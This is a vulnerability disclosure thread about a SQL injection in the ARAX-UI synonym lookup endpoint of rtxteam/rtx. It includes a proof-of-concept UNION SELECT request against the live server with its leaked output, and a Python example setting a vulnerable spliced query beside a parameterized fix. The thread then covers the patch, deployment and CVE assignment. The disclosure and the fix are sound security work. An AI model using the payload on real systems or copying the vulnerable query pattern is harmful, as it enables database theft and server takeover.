SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in rtxteam/rtx

Valid

Reported on

Apr 16th 2022


Description

The /rtxcomplete/nodeslike endpoint in the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. It is possible to include a malicious SQL payload in the word query parameter for this endpoint, which would allow an attacker to dump the database, modify data, or delete data. In addition, it is possible to completely take over the server where the application is hosted by achieving remote code execution via this vulnerability.

Proof of Concept

Perform a GET request to:

https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018

The server will return JSON in the HTTP response, with the SQLite version "3.11.0" as the name field of the first item in the array:

jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);
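As an added illustration (not code from the report or from the RTX project), the pattern behind this finding and its fix on a constructed in-memory SQLite table: a nodes_like lookup that splices the word parameter into the query text, beside one that binds it as a parameter and escapes the LIKE wildcards. The table name, sample rows and single-quoted query are assumptions; the report's payload used a double quote, so the real query quoted differently.

```python
import sqlite3

# Constructed sample rows standing in for the synonym table (not the project's schema).
SAMPLE_NAMES = ["Testacella", "Testacella haliotidea", "Testate",
                "Tested for HIV", "Gene_50%_off"]
# Same idea as the report's PoC, adapted to the assumed single-quoted query.
POC_WORD = "test' UNION SELECT sqlite_version()--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE terms (name TEXT)")
    conn.executemany("INSERT INTO terms VALUES (?)", [(n,) for n in SAMPLE_NAMES])
    return conn


def nodes_like_vulnerable(conn, word, limit=15):
    # Assumed vulnerable shape: the user-controlled word becomes part of the SQL text,
    # so a quote inside it ends the literal and the remainder is parsed as SQL.
    sql = f"SELECT name FROM terms WHERE name LIKE '{word}%' LIMIT {int(limit)}"
    return [row[0] for row in conn.execute(sql)]


def escape_like(word, esc="\\"):
    # Neutralise LIKE metacharacters so a prefix search stays a prefix search.
    return (word.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def nodes_like_fixed(conn, word, limit=15):
    # Parameter binding: the word travels as data and is never parsed as SQL.
    sql = "SELECT name FROM terms WHERE name LIKE ? ESCAPE '\\' LIMIT ?"
    return [row[0] for row in conn.execute(sql, (escape_like(word) + "%", int(limit)))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", nodes_like_vulnerable(db, POC_WORD))  # leaks the engine version
    print("fixed:     ", nodes_like_fixed(db, POC_WORD))       # no rows: treated literally
    print("fixed:     ", nodes_like_fixed(db, "test"))         # ordinary prefix lookup
```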

Impact

This vulnerability is critical as it can lead to remote code execution and thus complete server takeover.

We are processing your report and will contact the rtxteam/rtx team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the rtxteam/rtx team and are waiting to hear back a month ago
rtxteam/rtx maintainer
a month ago

Thank you for reporting this issue. We have created a SECURITY.md file per your suggestion sent via email. We are working on a fix for this issue. Thank you for keeping the issue private until we have had a chance to fix it.

rtxteam/rtx maintainer
a month ago

Thank you, we have fixed the issue with commit https://github.com/RTXteam/RTX/commit/fa2797e656e3dba18f990a2db1f0f029d41f1921

Thank you for reporting this issue to our team.

Jordan Sherman
a month ago

Researcher


Thanks for the update @maintainer! @admin can we get a CVE for this?

We have sent a follow up to the rtxteam/rtx team. We will try again in 7 days. a month ago
Jamie Slome
a month ago

Admin


@maintainer - are you able to mark as valid and fixed using the resolve button below?

rtxteam/rtx maintainer
a month ago

Hi Jordan, what is a CVE? Please pardon my ignorance.

Jordan Sherman
a month ago

Researcher


Hi @maintainer. No problem, happy to help. A CVE is simply an ID for this vulnerability. The mission of the CVE Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. There is one CVE Record for each vulnerability in the catalog. The vulnerabilities are discovered then assigned and published by organizations from around the world that have partnered with the CVE Program, such as this platform (Huntr). Please see here for more info: https://www.cve.org/About/Overview

Jamie Slome
a month ago

Admin


Just for further clarity, we take care of the entire CVE process for you, so there is nothing for you to do, except give us the go-ahead to publish one 👍

rtxteam/rtx maintainer
a month ago

Thank you, Jordan. It turns out we have deployed the fix to one of our two production servers. Deployment to another production server involves coordinating with a federal agency (NIH) and may take a few days. Thank you for your patience.

Jamie Slome
a month ago

Admin


👍

We have sent a second follow up to the rtxteam/rtx team. We will try again in 10 days. a month ago
rtxteam/rtx maintainer
a month ago

Hi Jordan and Jamie, OK, I have confirmed that the patch was also deployed to the NIH's servers, and thus, we are ready to resolve this issue. Thank you for your patience, and a big thank you for reporting this security vulnerability through the huntr.dev program.

rtxteam/rtx maintainer validated this vulnerability a month ago
Jordan Sherman has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
rtxteam/rtx maintainer confirmed that a fix has been merged on fa2797 a month ago
The fix bounty has been dropped
Jamie Slome
25 days ago

Admin


Great work to all involved! 👍

A CVE has been assigned and should be published shortly. More generally, this makes the rtxteam look like they take security seriously and are doing a great job at resolving security issues :)
